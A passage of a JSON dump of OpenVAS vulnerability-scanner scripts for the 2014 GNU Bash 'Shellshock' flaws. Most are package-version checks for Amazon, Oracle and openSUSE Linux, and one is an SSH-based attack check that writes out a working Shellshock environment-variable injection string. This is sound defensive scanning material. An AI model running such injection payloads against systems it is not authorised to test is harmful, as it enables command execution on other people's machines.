http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802086\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6277\");\n script_bugtraq_id(70165);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-08 12:11:49 +0530 (Wed, 08 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 04\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://shellshocker.net\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n\n script_tag(name:\"summary\", value:\"This host is 
installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! 
sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { x() { _;}; x() { _;} <<a; }' /bin/bash -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { x() { _;}; x() { _;} <<a; }' \" + bash_cmd + \" -c date 2>/dev/null || echo CVE-2014-6277 vulnerable\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6277 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:00:40", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-419)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120078", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120078\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:16:55 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-419)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in GNU Bash. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update bash to update your system. Note that you may need to run yum clean all first.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-419.html\");\n script_cve_id(\"CVE-2014-7186\", \"CVE-2014-7169\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n 
if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.1.2~15.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.21.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "description": "Oracle Linux Local Security Checks ELSA-2014-1306", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-1306", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123299", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-1306.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123299\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:57 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-1306\");\n script_tag(name:\"insight\", value:\"ELSA-2014-1306 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-1306\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-1306.html\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", 
rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.4\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_11.4\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:55", "description": "The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850615", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850615\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:25 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 12.3\");\n\n script_tag(name:\"solution\", 
value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1229-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:44", "description": "The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850616", "sourceData": "# 
Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850616\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:10 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to 
create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1242-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:40", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802085", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_03.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802085\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 15:52:31 +0530 (Wed, 01 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a 
function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271, and CVE-2014-6277\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! 
